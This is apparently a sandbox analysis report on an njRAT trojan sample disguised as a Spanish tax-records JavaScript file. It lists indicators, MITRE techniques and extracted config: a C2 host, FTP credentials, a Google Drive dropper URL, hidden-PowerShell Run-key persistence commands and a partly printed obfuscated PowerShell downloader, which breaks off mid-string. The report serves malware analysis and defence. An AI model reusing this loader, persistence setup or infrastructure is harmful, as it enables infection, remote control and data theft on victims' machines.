njrat | b91fd2517dd1aa0a3f6ed4c37e62794279da383ee8f3d3724818253efadbcdd8

Analysis

max time kernel
296s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-12-2024 15:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
Size

195KB
MD5

6675b77a4e527883e0cd36a107269299
SHA1

48b54aab7672ff52328632c110c7b14207f91832
SHA256

cb8afa9d1cab7e87066a992f5954e223720e39064d6d9f425a5e85a13e6a9b3a
SHA512

b4182d413aa3b8133c72a61a3b2136f6a61a4ce0a6f054d40329a00c897140003046ec34fce3dea5de6c88a491b3a920744cb48fb69b6c4f0c70f5bbc6f79046
SSDEEP

3072:lW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+CWXt+NWXt+NWXt+NWXt+NWXt+NWXC:G

Score

10^/10

njrat nyan cat defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
fYudY1578@@@@@@

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

hugolganador.duckdns.org:5250

Mutex

f07d2cf4921a47eb98

Attributes

reg_key
f07d2cf4921a47eb98
splitter
@!#&^%$

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
13	4936	powershell.exe
15	4936	powershell.exe
17	4936	powershell.exe
22	2860	powershell.exe
23	2860	powershell.exe
24	2860	powershell.exe
26	2860	powershell.exe
27	2860	powershell.exe
30	5004	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3560	powershell.exe
4940	powershell.exe
4360	powershell.exe
3852	powershell.exe
840	powershell.exe
4352	powershell.exe
4936	powershell.exe
2912	powershell.exe
4276	powershell.exe
2908	powershell.exe
2172	powershell.exe
3008	powershell.exe
3960	powershell.exe
1472	powershell.exe
1560	powershell.exe
2648	powershell.exe
396	powershell.exe
5004	powershell.exe
4024	powershell.exe
744	powershell.exe
4244	powershell.exe
2304	powershell.exe
4620	powershell.exe
3812	powershell.exe
2860	powershell.exe
1968	powershell.exe
2736	powershell.exe
2844	powershell.exe
4104	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wscript.exe

Adds Run key to start application 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_rtc = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_knk = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\piihp.ps1' \";exit"	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2520	cmd.exe
3268	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	pastebin.com
30	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5004 set thread context of 3872	5004	powershell.exe	114

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
2912	powershell.exe
2912	powershell.exe
4936	powershell.exe
4936	powershell.exe
4936	powershell.exe
2860	powershell.exe
2860	powershell.exe
4940	powershell.exe
3560	powershell.exe
4940	powershell.exe
3560	powershell.exe
2860	powershell.exe
3852	powershell.exe
3852	powershell.exe
840	powershell.exe
840	powershell.exe
4352	powershell.exe
4360	powershell.exe
4352	powershell.exe
4360	powershell.exe
5004	powershell.exe
5004	powershell.exe
1968	powershell.exe
1968	powershell.exe
2172	powershell.exe
2172	powershell.exe
4024	powershell.exe
4024	powershell.exe
744	powershell.exe
744	powershell.exe
2736	powershell.exe
2736	powershell.exe
2844	powershell.exe
2844	powershell.exe
4276	powershell.exe
4276	powershell.exe
4104	powershell.exe
4104	powershell.exe
4244	powershell.exe
4244	powershell.exe
3008	powershell.exe
3008	powershell.exe
3960	powershell.exe
3960	powershell.exe
4620	powershell.exe
4620	powershell.exe
2304	powershell.exe
2304	powershell.exe
1560	powershell.exe
1560	powershell.exe
2648	powershell.exe
2648	powershell.exe
2908	powershell.exe
2908	powershell.exe
396	powershell.exe
396	powershell.exe
1472	powershell.exe
1472	powershell.exe
3812	powershell.exe
3812	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	840	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: 33	3872	InstallUtil.exe
Token: SeIncBasePriorityPrivilege	3872	InstallUtil.exe
Token: 33	3872	InstallUtil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4324 wrote to memory of 2912	4324	wscript.exe	85
PID 4324 wrote to memory of 2912	4324	wscript.exe	85
PID 2912 wrote to memory of 4936	2912	powershell.exe	87
PID 2912 wrote to memory of 4936	2912	powershell.exe	87
PID 4936 wrote to memory of 2860	4936	powershell.exe	89
PID 4936 wrote to memory of 2860	4936	powershell.exe	89
PID 2860 wrote to memory of 3560	2860	powershell.exe	90
PID 2860 wrote to memory of 3560	2860	powershell.exe	90
PID 2860 wrote to memory of 4940	2860	powershell.exe	91
PID 2860 wrote to memory of 4940	2860	powershell.exe	91
PID 2860 wrote to memory of 3316	2860	powershell.exe	92
PID 2860 wrote to memory of 3316	2860	powershell.exe	92
PID 2860 wrote to memory of 2520	2860	powershell.exe	95
PID 2860 wrote to memory of 2520	2860	powershell.exe	95
PID 2520 wrote to memory of 3852	2520	cmd.exe	96
PID 2520 wrote to memory of 3852	2520	cmd.exe	96
PID 2860 wrote to memory of 3268	2860	powershell.exe	97
PID 2860 wrote to memory of 3268	2860	powershell.exe	97
PID 3268 wrote to memory of 840	3268	cmd.exe	98
PID 3268 wrote to memory of 840	3268	cmd.exe	98
PID 3852 wrote to memory of 4352	3852	powershell.exe	104
PID 3852 wrote to memory of 4352	3852	powershell.exe	104
PID 840 wrote to memory of 4360	840	powershell.exe	105
PID 840 wrote to memory of 4360	840	powershell.exe	105
PID 2860 wrote to memory of 5004	2860	powershell.exe	108
PID 2860 wrote to memory of 5004	2860	powershell.exe	108
PID 2860 wrote to memory of 1496	2860	powershell.exe	109
PID 2860 wrote to memory of 1496	2860	powershell.exe	109
PID 5004 wrote to memory of 1968	5004	powershell.exe	113
PID 5004 wrote to memory of 1968	5004	powershell.exe	113
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 5004 wrote to memory of 3872	5004	powershell.exe	114
PID 1968 wrote to memory of 2172	1968	powershell.exe	115
PID 1968 wrote to memory of 2172	1968	powershell.exe	115
PID 1968 wrote to memory of 4024	1968	powershell.exe	120
PID 1968 wrote to memory of 4024	1968	powershell.exe	120
PID 1968 wrote to memory of 744	1968	powershell.exe	121
PID 1968 wrote to memory of 744	1968	powershell.exe	121
PID 1968 wrote to memory of 2736	1968	powershell.exe	122
PID 1968 wrote to memory of 2736	1968	powershell.exe	122
PID 1968 wrote to memory of 2844	1968	powershell.exe	123
PID 1968 wrote to memory of 2844	1968	powershell.exe	123
PID 1968 wrote to memory of 4276	1968	powershell.exe	124
PID 1968 wrote to memory of 4276	1968	powershell.exe	124
PID 1968 wrote to memory of 4104	1968	powershell.exe	125
PID 1968 wrote to memory of 4104	1968	powershell.exe	125
PID 1968 wrote to memory of 4244	1968	powershell.exe	126
PID 1968 wrote to memory of 4244	1968	powershell.exe	126
PID 1968 wrote to memory of 3008	1968	powershell.exe	127
PID 1968 wrote to memory of 3008	1968	powershell.exe	127
PID 1968 wrote to memory of 3960	1968	powershell.exe	128
PID 1968 wrote to memory of 3960	1968	powershell.exe	128
PID 1968 wrote to memory of 4620	1968	powershell.exe	129
PID 1968 wrote to memory of 4620	1968	powershell.exe	129
PID 1968 wrote to memory of 2304	1968	powershell.exe	130
PID 1968 wrote to memory of 2304	1968	powershell.exe	130
PID 1968 wrote to memory of 1560	1968	powershell.exe	131
PID 1968 wrote to memory of 1560	1968	powershell.exe	131

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nKvfY = 'JA' + [char]66 + 'jAEkATw' + [char]66 + 'lAEMAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAYw' + [char]66 + 'JAE8AZQ' + [char]66 + 'DACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAKQAgAHsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAKAAkAHEAdg' + [char]66 + 'qAGoAZgAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHEAdg' + [char]66 + 'qAGoAZgAgAD0AIAAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAFUAdw' + [char]66 + 'mAHcAWgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAVQ' + [char]66 + '3AGYAdw' + [char]66 + 'aACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 